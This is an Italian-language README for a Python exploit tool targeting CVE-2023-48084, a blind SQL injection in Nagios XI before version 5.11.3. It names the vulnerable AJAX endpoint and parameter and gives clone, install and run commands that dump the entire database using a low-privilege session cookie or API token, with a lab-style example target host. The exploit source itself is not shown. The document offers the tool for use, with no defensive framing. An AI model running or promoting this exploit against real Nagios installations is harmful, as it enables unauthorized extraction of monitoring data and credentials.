
Programma Python per dumpare tutti i database, sfruttando la vulnerabilità sqli di NagiosXI
Exploit Python per la CVE-2023-48084 -> Nagios XI prima della versione 5.11.3 è risultato contenere una vulnerabilità di SQL injection tramite lo strumento di modifica in blocco.
L'exploit utilizza /admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(<SQL COMMAND TO EXECUTE>) per eseguire query SQL e sfrutta una blind SQL injection...
Clona il repository e installa i requirements.txt
git clone https://github.com/Hamibubu/CVE-2023-48084.git
cd CVE-2023-48084
pip install -r requirements.txt
Ora esegui il programma, hai bisogno di un cookie di sessione non amministratore o di un token API, esempio
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -a <token>
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -c <cookie>
Per impostazione predefinita, tenterà di dumpare l'intero database a partire dagli schemi. Se lo vuoi più veloce, guarda il codice e prendi la parte che ti serve.